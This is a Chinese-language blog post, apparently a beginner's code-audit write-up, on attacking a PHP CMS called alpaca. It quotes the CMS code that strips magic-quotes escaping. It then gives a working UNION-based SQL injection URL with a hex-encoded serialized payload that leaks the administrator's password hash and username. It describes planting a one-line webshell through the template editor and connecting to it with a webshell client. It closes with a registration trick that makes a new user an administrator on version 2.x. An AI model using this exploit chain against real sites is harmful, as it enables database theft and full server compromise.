近在研究代碼審計,便去chinaz 找了個人氣比較高的 cms,本文適合我等剛入門滴人士
文檔下載地址: http://115.com/file/e776qbw0#
Ue批量查了一下源碼 整個系統都在注入 注入
額,單引號啊,還需要繞過,開gpc就慘了,然而,發現這個偉大的cms,竟然自動去除gpc …
02 |
if(get_magic_quotes_gpc()) // Maybe would be removed in php6 |
06 |
function stripslashes_deep($value)5{ |
08 |
$value = is_array($value) ? array_map('stripslashes_deep', $value) : (isset($value) ? stripslashes($value) : null); |
14 |
$_POST = stripslashes_deep($_POST); |
16 |
$_GET = stripslashes_deep($_GET); |
18 |
11$_COOKIE = stripslashes_deep($_COOKIE); |
前台開始注射
http://127.0.0.1/coder/alpaca/index.php/page/18/
對應的sql語句為
1 |
select count(*) as a from `elem` where 1 and rel_id=’18′ |
當我們提交
sql語句
1 |
select * from `elem` where 1 and lower(elem_name) = lower(‘a”) |
這裡是一個經典的聯合查詢 本來還在想怎麼繞過gpc的 沒想到自動去除鳥
直接提交
1 |
http://127.0.0.1/coder/alpaca/index.php/page/a’) AND 1 =2 UNION SELECT 1 ,2,3, 4,5,6, 7, 8, 9,username,PASSWORD FROM user %23 |
發現什麼都木有
看源碼 appvelempage.php 其實裡面很多源碼還是寫的很巧妙的
01 |
if(!is_array($page)) show_404(); |
03 |
if( $action == 'add' ) { |
08 |
$info = unserialize($page['elem_info']); |
10 |
'page_title' => isset($info['page_title'])&&$info['page_title']!=''?$info['page_title']:$page['title'], |
11 |
'meta_keywords' => isset($info['meta_keywords'])&&$info['meta_keywords']!=''?$info['meta_keywords']:$page['title'], |
12 |
'meta_description' => isset($info['meta_description'])&&$info['meta_description']!=''?$info['meta_description']:$page['title'] |
14 |
$param = array_merge($page , $info , $meta ); |
需要一個$page['elem_info']那我就在六號位寫一個 仿照官方的 elem_info (十六進制)
得到 exp
1 |
http://127.0.0.1/coder/alpaca/index.php/page/a') AND 1 =2 UNION SELECT 18,PASSWORD ,'page',10,1,0x613A31353A7B733A353A226D6F64656C223B733A313A2238223B733A333A22706963223B733A37303A22687474703A2F2F79752E6232342F616C70616361332E312F757066696C652F696D6167652F32303132303432312F32303132303432313030303135315F34363936352E6A7067223B733A353A227072696365223B733A333A22333030223B733A373A22636F6E74656E74223B733A303A22223B733A31303A22706167655F7469746C65223B733A303A22223B733A31333A226D6574615F6B6579776F726473223B733A303A22223B733A31363A226D6574615F6465736372697074696F6E223B733A303A22223B733A383A2274656D706C617465223B733A313A2230223B733A363A226C61796F7574223B733A313A2239223B733A393A22706167655F73697A65223B733A323A223230223B733A31343A226368696C645F74656D706C617465223B733A313A2230223B733A31323A226368696C645F6C61796F7574223B733A313A2232223B733A31313A226368696C645F6D6F64656C223B733A313A2231223B733A31313A22757365725F62726F777365223B733A313A2230223B733A383A22757365725F616464223B733A323A223130223B7D, 7, "1334937721","1334937721", 10,11 FROM user %23/ |
成功爆出 管理員密碼
把上面的 password 改為 username 爆出管理員賬號 拿 shell
破解md5 進後台 模板寫入一句話 拿他媽的shell 模板 直接寫入一句話 (需要把修改的設為默認模板)
菜刀連接之
本來到這裡就可以了 但卻意外發現一個狗血的 東東 僅供娛樂 請看下文
******************************淫蕩的分割線************************************
現在睜大您的鈦合金狗眼,我們來看低版本的 2.x, 點擊註冊 www.91ri.org /user/reg/
Let me try
然後在登陸後台 www.xxx.com/admin
把級別調為20 註冊就是管理員 閣下是否感到菊花一緊了…
